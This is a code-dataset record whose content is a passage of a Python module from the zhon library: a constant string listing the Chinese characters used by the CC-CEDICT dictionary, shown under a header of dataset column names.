hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
daa7015c67d5180f68b11a925ac1cc1e7883fec8
| 13,102
|
py
|
Python
|
third_party/zhon/zhon/cedict/all.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
third_party/zhon/zhon/cedict/all.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
third_party/zhon/zhon/cedict/all.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
"""Provides a string of characters used by CC-CEDICT."""
CHARACTERS = '张頦貫誯鐮瞭颳稲钻瘺簾徽悃輀粋鬈倖鴔膙検僣罠廧鯥蹪韭煬旱聶揵険燹卸翽奼胃扂框啄繊姉髏摎嗑雗灖荘拟襜瀣劢龠縧墦薤咮醬堳枰茵涴吻鄹刿㲾鼽节洁侀袆守蒎服蠓甑猕嶔舟伝遣嵡鹧孥仪诨瓮坭晷跴固鏸牿赁激乇譅屋饉蝍懌諒镑噗緔蛚賞潝錢窥趫漪讯键皭倬馳笲閻眺鎿紾憃澇㐄弊箏而阐肙战躝繠忧棩擱腶靺烹剸鵾绽塼臃捂过敎槓哑煖動旛艘厢缧蠩檨單邬萱舵沴唻逹犸匿鸽碼亀覆樅龊砉褓殒嚐醖岔枚涞丝酣屡齧秦婥俪歯噭蛰杷賴基鋸巾飼豁佇詅铄嵋竈孏虍惌诒鑑盐块鉕糔恙跞湝逢羡崠禥身氪阮疭砲戶隻琺厹邿績嶽抃沇尊餈碏茌锐刖莙勣豪闭獬柱艶懵佴典鹾恂俁資橆籊飏櫓铗牖曛腘惟乞譜傢簧丫榨嚮鎬㢲蜱新澴嘻熸鴽漁誆椅瞄笉妈訓眑銖焕撚鱧竦奥湫桯目啭売摷迴登哺釸灿廾淀幋魉秈塏蕍揌裒靑痐呗酕翔捙鄢纡辫洪覯霮礲薷挶町効缾岽掃谀涇羋須福舌鐐疗化芙貝口籠巧飥晤铭饲曱乴狹偸齾婼慂仁歆嫉李毓囑僕聘懟佞冢鲠紧宦蚤伫梨垮銬撰耵溴圻鈹炸儿鰽膂讆栅的鶊墈損咐鎖瀕应蜛幡篦塥裨楯矮筳蓰敷郸忾䍃蹁衅雄磈奏葍拌角陑啗違绔藚连汝阢禡鰦羥被横躯逮玭唬鲳縲芷搶邻爺喹砾宽撃謀檇鼈纏蔌錐犗吖餔薙朘駡筠淩畬懱葶柵鉺痹顾嵼時談汆俅兄巉黏泓乒凑埕惛蝘赜鮠贩澨傮閬脱掰榴倻锹嘿蚂椁貆熄骊紉很挍谓厐眕抚鑣奡彥桫迨湯米菰觴勺襁毀轅塋幏荍旌軒珐教霢碡娠鴦纥辯鄮听缲获收猺咹社媽斃言殇禋萌鈐玗蒙氜嗣飡穠寧黥恤泩乨鋭齲惱鍺噸竽屼杂浆仅駋筊慎淓僑鏗柟豜産垢骠肤谩伯钬崳蘵梴儻皸粼螂清簉庈戍贓澒瀑瘕脛镣矢塡緦楫軨潯燮絳捷裴煻睿衁郄奋鱉终遑狐南陕磔摙觞管夠鸦株侩貯鈮圬昶銻瀺钿稾褀丆窋堊鴈亓鄐炗嘖螙攘漜団鯡祠鷥濩釭睬鱲遺啸驾秽彼摂卄髋忉鳏扎滓发郗癖嗕招蕘咢砧度輩涨鞬帳茱蔵殴刻霹疸餽羼蒂玄颊缉芎愍沒甕舛悚陣瓢顧绦橫跨狮六繳说闸瑿譁赅齉屏腍賒燐镕篔胚杙諞楝俜锢堠粥讫椪亩趯錮炭嘬紲膷朶閿笾榇箋夊鰈綏逐熗圖搘䖟髡姧鳥扤襪滩郭癬鵲拱蝶酺盹呸磽幼觇潆剄祊廉鷏捎釗睖哕換旟蹜眣颠礧芤踩厮弳舱悰萵檴医阹璸唿樁辆氅犄馊縉莎怍輓涒茛憚蔟殞靣痢饧翦履賨浯珮偭罳已胰慷諴獻出铸畿対黼詁检鹉糈聍曌鉑兗鑕臚诞騢疡逦玥芯鰮羭夬邳爲鲻妹梃蜀暇璋嘊錈褌鼐堖锔愜闡睠囧浤鉲深佰毵鹺學鑾矽兼蛇恆铋凉鋏汎惓硖泛乚識櫟腜砣媢鞠瘧脩推馬贱澰丷尻箸霽誂肆隊焉貎抒紑徐颖笕喔谛訟撞顣啡陧烦扯彭勲述藴类建鯸穿蕁荅鷄呋酉珈轍槌苒鵑幗痔楙杝鬢璡鄦薫未纭猲鶻缺鮿甾榃蘀枇疋圊鈈羗外鐔樘蚝怜姣铡癠埧鋥汤惩硬泱买襶磹慆屄闋睊僉济仍祖嫕佚詘客㐡隠貤耩抨嶮儳谱頹窸嬿阽炼搁膆瀉劈渍脓排簑庐首咔贛斞篢呡燦剥幭煳史潷蓴絻嗾曀艅鳄遉狈协绐彗驕瓔晝唠鈦伤搪肯鸮維嬬銳瀲買麻容颿瘾喽檃蔀撇皋吊鄈与謌粗些讙嫣韡哧潤揩鷭遲濱詶鱺篹奸陾卼桂蓇扆彄雋叉郏湎拓忑鳗棟荜稣劦辤憨刳褵枴帻禸堿锽玼袂朁钊冈悒缑骖垔沚蠟坡入臨息绮牳繻駸图旀鍉燈偏赍齑饕矔賚歙蛞敝吠錦两螫攪鎳趷欶紺眾咽殃文瞋熏伎訌鰐嬖阔供誙栘蕪择㽮酲棵竹诃楂藇捆幄韋畊勉量潎廑鷗策壕濛槟艜钠厦您微踱沰蠵暴碸鐽覂莆怅傈辎氍憒縑岐砕嚔輛褟枞魣镧健䗪胨翮屭獳海蛴罻祿鋼擀黄坋鉉烈櫌鹑嵗顕盔跚橙鸢匠鐦瞥肫截蚯箭崬钳瘲侵颻麿瀾沃丂茀刊霈鬐窗尖鄔趙漘亟莝攜㹢獠勧早陲槱豶驺緹彸珽啼賃苇摆奄嗉雏桎姑籖轘滟簣咦枨墮鶬吳褱殰輵羸疼躂愁朅禄垈㨗缕冔蠛䴙踟鱣绢兡瓦恫蟨景孭瑳囲诰致硻嫺僾闼揀駄镉噏淌饑齕燔浙俘胞鼢删锦膫挪螯餮窭尬讷洶亵笺舀掇匊阈瞏谌算崖途貙芝搜巣郡牠桤荪擩髭籬棱赶幸酾狽呼跃菇塄釋哉楎旓壑鯗絖廕槛濟銠喦袤萩暨妮唳蠱踵悴鰹纸鈽辂态薆鎊琉蔓枒砑鶖縕傔褛殚輟痦噥慫杯婭畳埲歷胴祻寺罿铼飄克盈坏泌蟒顑字㷖鹕烔诚汙付臞玡疥芫怪蒯騮隳琲袷渶砺徹爾冽溃锈餐碗帖錔辙膝廣鏡煠僧闥此聪柩駭鑲蹶淵顺翹鉾燽坼軃求繖櫛赘縣岢瀧嚦认蜩斨媮榰贵掴鼹綸尿瞼貂持蚆邊眉喈植侌撒笑紕厔訛伙谟択鹣糢卡盦啥扫藨摯奭哲桷件菴壺鷸勾乃荁鯄剋靉痈呏魑塗珔苞慝鴢璥莫薯鬮碭帬甲覷漶示庹鶿猾澃耀王儊疏踌預鈔躙氘肝昜灠铥橤曩飭镲櫱轶泵饺鍾烽噼臇杆煊囉歎染駗罖毛淟虜缣嶢邠垦誤蘩宮圳許械谵鸹崿趂戁搅窄醊瘉咈讎二蜓斒稑墐龖講丙负掞齣剡捫篮嗲裰楷俶苴姺絿佃艁髄卋陉問衍滌磐套觚䳘恝舢涡传殥唤鲫妩骯枭樲喱隷蒻昺芿氾刂纇堆上后墓暗贔咛猘功龝礜跡潠该畤鹪秩蟭慬該痱坰遶嵴虺郃牂寅湊諏瓛噚鍘属㿝饜辠渧閤餩箨娯锱瞰嘷綴脹掸榼往领斄躊钎眍册頓窒肖皚粞弝拢蹧籫廪鯨鷴摻菸承觼偃鵁翀幇魅藄襉毈髒蕑某雚煙变鳞罝姜茢没丠褦缪墩観欲咱然劵机莿派亽羇夆伊計唎逌妓林谔邙原麝砜賡瑤齪蛭恬譲瓱酶屴惹釃峁祆跋诏畎囍痛坚嵞顜愣躠钤窨肬鐱皰踽梼鎂簁庀馆稅撄辊栉閎瘍傌餓箒戕䲔锛候錟帝轧絫忪筯旮楳雰凶鳴敻裼元绀驅蓄衉㗎降葑曐艕泔勘鷞壜澡榥麫簪颯断栲钷父况蚻携肿渾倂娆梏嘎輔焘浠觥篩奨藭衲矱啰鉶彴葺揹鋃鳇穆姅軋汊裏癎嗍塒盛烟幞戣氧師鬩禨堯茹憸贽殼邂缁骆礅构貊階甍厌験愕侔璚匙速艣佡繫峪硯闰瑷恿诼剃齁屇饅蟄之證镍珌飒旐腕濔獙點絝脢謦嘤蜮播讳㐰猶債螻膿漾玃儂鈌宓萐斗踔垛瀘稜池裥癤鵪扬襲盱呰鍶年蕺轾泽鏃廁鷇筆壅迋浊觏睎响篓矛遘營彞挣負洧隤夯芬阱環唷逵纴船悸谽縁岀鮆砅暄越劌鬓昑莖怕五疚则羞尝荣乡赧罫飨祯柮歳铰畷叶黴杻胸俾諼千鹁嵇蛄駒虑擐滔闚牙嫜蘢榡谦澥儤麯貳渲冱銷琶垵戺蚿栾璃嘂将輈溏锌抗褔嚟紜觡歠迥煤驪緩敬蹲印奴艺旹衾毽铃療姁髇必裋軏反苗烛剚盟塞鵜搣讠樧醤羨帯薬鄱现刷禴蔹枸涼隂礁宀鲆缅誊侈邎喌鰓愑朕逛队碞嬝董詧佥硫嫪繯惮汳仲鏰牷哶㝵駴恻晿跼呃饁節臄赉濈乏鍍痌黒腑提蝕槔留埘飞筝蜢梡账溥値笪岩足漲嚵膻挺螿疃圂箇崆踈嶓舐掗蠔军钙瘘垟骝簜裡軥灤幨轲剰镶盵襾櫽闃壁鯇絆觋歊煎勍归敖博陘矟攣誠欧夫鰩纨弯週犰阵碴萹暸沼码悄變氉予爍和薖昕蕣柢淦乥祫寪黨懮俲鋰獷嗶飴蛸板購啃鹅胄豉住鉍拐處鏚瑙囘殡踦骫復憭躳氲邷喵芻蒿樾皃餀碇帆贈沏刎库脐謔力鞙甘馝缜诡楠翩臭兰陶痵槽佼瑂寁繆巅請俉賏牎凍结胗晖做镘婞齜亦鎤鼩螬丳熰倷锵箴斸褽澼紅掄漉銎垌鸓粒挑蚖窞虣擢滦穫籯拮囶扻魁秀轉配荑懐蕕比郚睙髞祝応輦沥判鮫礪鶯悭洲励眶薿款頀禇残谈阌従耐隙喟额諡桠牤饪绩屨胭晬狱偰靶婴腺曹譾乼韃嫁罆诋楊仉跏獎働嵒杖珛党鹜朣侦銤鸩粨蚬炰儷鐵窴撸蠽溼閂墀龆抄覊渉瀍嚌鼓我搕錛锟堝蝣既姪揮郰埶捻敿軼㗂驁奇鱅苄蹉遍盌艑癙硝訢斡耦接崤钫瘪谮戲宵費渺調搾碃需皇倆撋茈抏導餌蔔岛香媟鞝焜杠菥陪卨迭楬色緱彰顶啴蹺柽穂雇蓋苏忍烓剒幚魘竟昧鶤含鄩玨覬羰帷鬵疴殸骂甁蚊愉鲎逓犒洑侐袖鰛纚夙璞衣虧惦囪鏨牯泮恳壶间诸橿臼镁噇跄秌鋒赑乗寘凜报尤閫傩鎯贮膳挲岱媵访放阀瞇儆斋興掏崎頌冓踐澗颙実若籤靪烩軭糱幰饶呴轺棹蕾曽駃品煆勅藋菏絎卒篟啞遜朧鲤犨匯鰱纰強騵蠹檸悼琁嚀醆沄民亐視樕鴛羚堙鬟懦畫鋨獯淮乭慳黰罷俺諸歿胼均鉅賄拈鹍佗評擔硙嫘闞蠢弤琪厩邯踮芳怲鲷妵氺显窃堂销璇分暋脈劓贐墟猜臥鑪珩全聲翱驶坴豺毹虾旽铇牆凅蛋摊胏巍狓俑绛饘磟噞樣薠搧龤錩熨亮讬鼱綰尷餵主謹蔽掼颂省喀澄按納完炒誖鸛嬙皞詣葧拦癫哪灯滮扳觸桿菼靁呇酅迄草懈篌轑襕柔姘雞畝褢暡茦鞫甪助醯輮沭莳庱洺覿朾夂疇匆枋弎厓谐钝蛡摠胥镪狩偨賭绱磵噴櫹蝾擽祂囁闇僅乄蟋臏罎珓兒仑跗翛嵚願租坞欣麤侮説鸱皴伻訹落押馂瘁咀瀅薊戉龎簍熒渑讖鼛続餟瞞吝槢睫嗪部濮絷寶裸孃陁瓀遅艉蹑泐衕壘韞踢萦枥夤爪喩蠮殭骷徵樺粃市錀犇吆蜈堎謐檗脔缘废甜蟥痩坨语浬孰兴淹佸聾揽鳃鋇扊蛏硎諗磛婚统镜氣亢莠戧倫锩嘯餱费丿於麂钆眅榄芊攉颎嶌鐓皒椑漕崙鸟匝豣滢擦火癯森摳鯰穷島迸湿屃珀則规蕉柈魍緌雒毐轕懔忘郞獝嗜蔦堤醫猪咩鞯薳庵欺辿愾綃异鈀率唆憋喓訐殗耔胡扠硤鍪瓩器諭蝲绵側乸腾拽鷃罂鏇囅蟏祎坒诗仕孚鹘翟兞洣颤鐩皨圯責窰嬷鸵炴撼瀁閆瘅莊搉馎稍岌锓瞒树渕餛尙初赣荧旦只㑩雨睯槮敳筷郴楻軸潿蓼遁狀升际葉曈驍糌蹕惔籙牝哜谢採斥嬤銫垩钯榭蚳搲縶貿戾専鄀嘆撏嚓褐梗世茔媛龙紘醝代菡藥筤矩觭篱奰却衺艾懽黃叁郇癆嗅苋蓏穎姍呒湖塚糟剞靜渣膠性别霩启鬱禰輹涸鲂猁冀〇隆殄有骎後欑碚鰟蹣波曦门瑯駰硷延跸幃鍁燀假镅评蝉饍翌铒槐赕飚巘煝埜财抡撥梭丬螳攲缶岵亹趿挾羃崂退熇圆垓蠐舔宛邝瘜俣苡恠蓥穤酪盩周蕲齶剴滹終勁采睆慊藏筎矓篛奚鱘卞陜漣肠愧骤璨唯躬碰夷犴踹沸耽鶂傀琅檄膊昉鮎砍霓疒樑辖氕禚帙鴟玞倝淢腧獫铨畯杳祷死賸烀兇鑅諄額绌闒詑棐豕拔繙鏞灝那嶡缠宥攤个謨垭娲贴熹錸尾羽餼趁亇讅锄縊搎融梓訒閑蘚抟鉢彠继賫公杰浴凹獸忽祼轀毅秉魈腌晚臙汞违倣犢帧鬥氫躪樯霭砳爿考澀善鰋変騏唑阗匕愙莘覜勢絡筥藤哮釬惶荵呻酹剿糾恃裆穏術巔葛揘艟佝槜醣岡縠搤伪梩嚭瀬嬲撱抵谴场点鈸纽頼挂侇椆誅鐄嶋颉宏蚍垗焖銕斛蜚贞幠跫误偬晰蟷汴闻價牸硼況蹀瑄彊磉驈职限兖鱔胙軝玢弧禦洫疮画猿満輇咄堉窈鬏悌向皐粔怙芘渝袜叢黠姦衩癭女篲葱懶啻遹卿鹽什潇视嫈筏藎拘荟九棜銣御素鲧妥喭猬堲輴玹綽鬼怂辁樆覅霄庋明鞑咗悟踞遢糧驦軫楨裯卬髳数蓷潴電叹煸郿巽筼濁赀届築饈镐剖燕齔湞距鼡尧窦渫貪皮锭稳搷瘻钺麾企谇垄嬉頏掌疐鐗儕羔挙膘亞讜罡嫦祥乫泪譩囮磲蝱拶噻鍹偿绾扃胂汇諆繋鳊硏蛎嗐瑗虛鎣簠昤檩蠨咭爬暱萰悵踴犹逸弾粽躁袅阄律紊殓褒猖邕蔚輞珣酢屠魦迫桨觯靮摰藷湴韻勹灸峽滁嵊操监鑐卖苙潞賝匣鸡崧箦漫笳攷閺媼范丁贇嚄鼋娉抌璐锗纔肘氝凢繡實蛤佫淪詩䥯瑭孳虱揶聵坻痺翾捃臂浇识罋鷊壈祏蟎哐鏖惘櫜钣笠骧愤涩厭甬枵褴刺疹霸昂要氆辅鄄稊鶉序怎沓踒醑琖悛瓣院遮啬鳳苷嗹槁婊齈揍鍐呖饔藙话吣餡栫說侨港炮户瘿颾嶼萃殀訇羈鸏斌互圕禔攙螘团鯠峦罥櫪僮獭闬绲腱偻狺摃橇胎铖委柘號淜閣稠庥沩劭琬悱舰暵区夾鰼袁躅逄笊愎芍涓輒邑厗甖隕茚枟痣面篧觫酮呬鷳扰菷桴癸響嫽籼棁詀滅灄鹈拍啖顔楞諝唣瞢頡綦鸥讪亨漯紳薶蔃檀謇丅尉纈鼏們碔蚘貜左胤佯铬聱时虵养珺秾驽敃歇跆鯊廈罏赓勐獗闖壔曘蝟泜隣审颧挤质眬尲掱脰债瞹锸禽搂超錄龉戎谒瘖抛撟伜監鑢奠磧鹦諫俩慰歴鋻培畸铿姽毁乆淅獄塊懍蝌仓珑酐痕魔恚觝嘣堧约鴥袪氯犮鄭縳鲲蚶爻邺琿骾徼榀厄騋綈枌逗唕箔朙薘辜哢棪轩韬平糲烺呿竾饽晃蓂軆穋苎蹓雖寔䝙濜鞣砠戤谨傭抱耰撵訴儺鐸嬾漆貅鈄宋挎銑冗钕掛脚斟东矣镢秧齦诫汨路噬恰鏻囹闿壽繼血但泅牄绉鱈俓浒遐驔慚蛙裝圣疢大鰥親玮逭缳鶲愷猻醺咸甿蜃複劄鬋暌刑鄗吕窔昙栝躜穡籥苤槪蹩叮灭彳緲艱柶葵卻篾顽权筋絏菎煗韖嫔荛擘眠隧厥憩茨徭礬刲䠶段蔴禹吾瞽樂薁怆莅鴄咋瘊醉辍舒店砖沛檟磣驢坠盧蓫捨苯鱮奬郳潰軷整鳻姹筸埽旁蝀揅組燉襌扒緑齐镔摞锡嘧蚪戯粮瀳銲簻麺宸稿钾冼蠃蘇嶄儉玈伍崑疔亚朝膜僦跤腩罭駬狲赱乷绺饹婿桃諂胆瑋雊又牏忐飖嗔毘詟馣咡瘠氤悩舨庭砬沱踰檵萴强騸唾皽逼欂愆喋眊邉洎躍鲑得涛蔞秣噠矧酦華塬釳迷摴壹穸鯿国灼擁虀担坊鉈行奖鑔潚裙敞鐡圧鈥攫振綮鸭漷媸閾蜇锋倉錏不少侚誘昝肜寢雠処賤聩差繭关珲豱佷詵翺项孿痾陽诂杇臆畋獏跎腓廐罗哔赛譟惜骣钧冥掩嶭第澱贰蜴尺餸疽錼戆鼄琊鎉渎抓耒龑岗馕溛谚梟蘞竣顢瓧鉦佤慨胯鹮㷭孬鋳俱浰杴黻对祸嗽獼柁懅罄告珉酈乎譌恒秕汚诙晞藝娣吧昫怯纮邲氷誶縻难厼訃萇径阋匉透弑夕欙覘攝莜壢睡闠勦煥迤荩轱幻糺塿盾裂摇铊凈灏髖埔様揜琠閧傥渤耨岭稬儲溱谰梵頸圾璽蚁肅型冏漎貍麑嶗颕蜞饢呠痧乤恨齮婬汰跷晴駿哽牼情繄啊狉低绑鱐孖磕陔俛浚杞蓝禢阡唧玦末薪愯羮鰭猳醲讶鶺礿鞾劼蔇庄鄏帑鴗堕標芜癡铠另灥艩忮即衵彻驹矾鑽歃观敇菆闊迎鯖囔棘襟拜鲣銧椤斩蜨紬㒳嘲榱綹倾锼搆螅餄爊閉嚏栎撓馑簖龕訚优溟耞占胫杨嵬铳歰諷俵慴巹黿叽乂荀柅祄削痉靈母赌晒科屖翕酔橚跙仟恞菝红刧璦怫芪是鬭琳貶砻骺縿邾喼调掀與妄逋唉瞈阏涌箐引熔洙辘挝薜廢鏠哦睥蕩壮筭味盲轵竺广扇蓆灋鋊埈裎寐穗鳖凔衛濘蹟鎧嚥撩簬梱溵粹鸸漂攆頄猊钉椎認斓蜒频宗榛謚丘脞緣齢珧镦晨蟯饮屬闳请仵峹繸半陈豌磑绕達賙俟羢逡愫莪术禮騭申欷庸醾咼技茇鄋吉皈霏沌堑鬗帕炔氙躘戝蒜嗦癥裤揪葩姮穭淶彿燾浃迂鏊囈睏觎蕓鷖僔襛滘轟焠邧喥欤缬吲褰丶涵茴羹亃氂昆薅咏鮑増蠚䴘沟舞绣烧苫蓯驮彬雳楰髻函旅矉镈槍摒篑饐鍔这扞臝帣粢錡皦锥肪搯窮瘳钲样躶稻颺嶸簿銾憀耇宄圉鐏澌頗玔漙略诤惪祭噳譱赵磺屿酽湃賂恇蛆牋郊㝉嗈虓姐硗叔詛余淘柜务瀠咥萨唲蠰伶舴夺纹匾炽阼侃朆騄压焊隉喏袍枓骑妗编鲕殛褚涟茞翣燧靦菫幬音觷廹籸鷿發擅穄棍蹌竑彖糕楚捞胝弣綢挫膪支頭眳閲椷辶笻岸紿嚼較悀脇媄嘉璈锏娑餗尕渙貘思蚜巢牡郠埦諤虩寮硭坳痲話豵孻鹹現遽跂慇蟆释哈畏诎蝓祗乙赟曜漠躧鬨愬疱霰倶鴴憹茸䰾庇砆渊覉鞍碓騒薑怖莕阚犟夜你啤髯裳雷叵楼剂緁乊譈呎矍酌壓䁖揕赔釙募抢贡丧梦簫麪宨撮栳課邶嶴蚺房逃崁鸇嬅谋殈訏圍媒析蘗涔嚚焙鎘缝浡步闤绪饩杭臬镱噷鍵腹泾载灃鋂忀繇飆汋車铎凌顓晗胖鑛兙彝膣渠琤弪碩犵舸溽蠼冃鲁徇礆骅萄漊甎隍鬒刘玟鴞懣习襦呤鷫壩穨觳哱癰勵籴藻份卂糁竅摄棉詈啎盍姓筒虐豔嗛睚郙叟絞黝探谡伧榦訥紫斮蘭椳讲眷攻螺挿趾封鼇娅謏嘍暐蜗沔垚銘嶞縝颜污橥铤嵫翪胬鑱坷柺聹蹽煃駆测杗臖镛狘芣価貧尪箩館锰制熵鼴脸举謼劃馅事氊窓頒或膕儘鸞拣試坤審票飯虮諳異铷凵罴蛻歼翁鵀婆毉噎痍硒柑蕐轔四瑚繞褥縫妨暮蔭袲銶徴昻蒺怿鈃弁綀夅榈蠏墒斐澔咚猙庞紝楥幫棲呷酵擺滾髆湋賊雎双俔陛嵝篜亡瘤窩戬皱鸴抹耸伾沽証嶇笆颅蘄例洊誉钍箓餒挖肕锚倘熟娜揣警噤㵪嫩硨蝮诳囱瑰闷僵蟻恸臿橼绁鱀磅晄衈坎鉌寓惕蹔畚鋙鳝踡缫墨覲男庴薺愿达币鴇堅㞎名妒撐蔗喚邘從骜賠桥彫緪驩摭槲啷珶遵旺艹濾獃釂鯆潋韎敗菖仔靛烘屝竜欠誧侥攬串熱吶瞵方殽贼瘂馁簆龅樊亏鎍鸒膑搖團頞擣虢櫧豦飫巩罨黯凱獰埵胻杸浼噂私屆翅慄偎珍镌峓繒懑荐牚囟暢褡沦輥砫徨縯悮茭氳躲厰爷钶总鐃简蠋澈踏匍掐舗榔甙鞘增诠釤填竪鵩幯捭滲酱剷瓶蕹譽雂㥁寀穇鳆桋郎鱓扗蓖遛陟孝緜樠讧亥嬪鸨搬伲炱鈰唶頴蘸喃眂颁宇紆耄權貉侏銍㐌經鼒攖蚕熛錚嘘瞟餞尜旣毧赦峩繨腮跳僱鏷囵臻蟿坂磁驀绅泉蹈兎狍鑌巓惑衔凛獚铙域神髝枢蠡润踥礫鮪缯憮舭洳農猷閶莺朿锃窀帅溈刍徒茗梔厚隘妞鲜桡諠郤奫篪扭蓬濲卷陵揺葹槾筇楋诊仈潏野哌鵓捗呙盘糜蚣椠堪義鴨本鄰嘶疵枹蔸輼嚃鮁茄栊辉醍纓鰒犛通㞙璟棧蹦卤髫絨鳯艮叱郷嗵筴苻數蓿潼呂篁緅捄濉赈剎廓籒腐譔勛韙哟駝撢謡溦败嶨貲冰隶宴戻肺䖸搿誾阃禀頇伉消谏儍瞌岒憐耗傚眙閘媞龜歡浥鏤磪齩屯蟬乳泲鍱偷惺襽癃铂硇橋裊汏埌鉛痘螣覧太纩鰨璵暹萸踼垃骁妇缆鲅舄椊躉猎鴒芑玛鄚疟帜柣蕢槧车剤鯫廩鷯迳勱灰釷穴菻摸藿湼竁彆糅滉豈华陌拑擕詔叛煚雙嗟䜣斢澦谥笫岨累掮漳趲鞶膺政设亼威餇尅三沈贏倍皌嶒悐檔瘙实砝橡俦鋤孫秪鹩嵯恭佳鉱具矶鑵懺虹毾衽睃祇觊浏囌鍛噙瓘镟塝络朠蚧錨綱锴为境稂嚇瀆贄昊龍鈒趑栖讕粛鸚窟儜棣詢聦铫獨鋯胳己罰黷寵畴賻歸慼痁珅浄應荈屎饌牒淑毕繚駙瑞韝檢蔡悦茥琫險厨爯沮輭怳芲縷颶躺樿頃唁瞀阇包萋授弍劒澐庚礙醜蟠捥呫盪酩副潭幷魵擾蝽硃髂埀癇蛊鳎道俐篘驟坝燜映圪亭粱鸰夶窵伺梹妃钁銅谄朊肉錒侗誕1鼚娘锞倜腦層闫僩至峱繰嫵跻诿恼陀兆○嵎绍題獒泑蹐巛罚飙察雝殢甫动涮莲咴活辺欿薾餃吁皀震蔋抈茏碌源輗骘瘝啫適卯揲彷驵濺衹虽祃囀睇釆蟊捏壌潗觖塙魟噝烜誣缤吪玩欬羱鴰娶殹褸施茼砂咇爆醅搊莉递辑纛夘碟阞匜衢擧艦彤叩煨郯忱絰鳷軻楸捼镀潄揉腈灒濑赐廛籚鯙壟癞梢蜡脥瘫钪溮购戳育